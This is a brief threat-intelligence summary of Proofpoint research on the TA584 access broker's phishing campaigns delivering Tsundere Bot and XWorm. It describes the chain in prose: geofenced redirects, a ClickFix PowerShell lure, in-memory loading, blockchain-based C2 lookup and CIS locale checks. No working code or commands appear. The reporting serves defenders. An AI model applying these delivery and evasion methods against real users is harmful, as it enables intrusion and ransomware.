An initial access broker known as TA584 is using the Tsundere Bot alongside the XWorm remote access trojan in email based campaigns, and its campaign volume tripled in late 2025 compared with Q1 2025.
KEY FACTS
- Actor TA584 initial access broker
- Malware Tsundere Bot and XWorm
- Technique phishing emails with unique URLs, geofencing, redirect chains, CAPTCHA and PowerShell
- Trend campaign volume tripled in late 2025
In a technical analysis by Proofpoint the researchers said, with high confidence, that Tsundere Bot infections could lead to ransomware and that TA584 has been active since 2020, tripling campaign volume in late 2025 while expanding targets to Germany, other European countries and Australia.
The campaign begins with emails sent from hundreds of compromised aged accounts and delivered via SendGrid and Amazon Simple Email Service. Messages carry unique URLs, apply geofencing and IP filtering, and use redirect chains often involving traffic direction systems such as Keitaro.
Targets that pass the filters reach a CAPTCHA page and then a ClickFix page instructing the recipient to run a PowerShell command. The command fetches and runs an obfuscated script that loads XWorm or Tsundere Bot into memory and then redirects the browser to a benign site.
Tsundere Bot requires Node.js, which the malware installs using installers generated from its command and control panel. It retrieves its C2 address from the Ethereum blockchain using an EtherHiding variant and includes a hardcoded fallback, communicates over WebSockets, checks system locale to avoid CIS languages, can execute arbitrary JavaScript, collect system information, use hosts as SOCKS proxies and offers a built in market for bots.
WHY IT MATTERS
The shift to Tsundere Bot and memory only loaders increases the range of post compromise options, including data gathering and lateral movement. The described email chain and in memory execution steps make detection and static signature based defenses more difficult.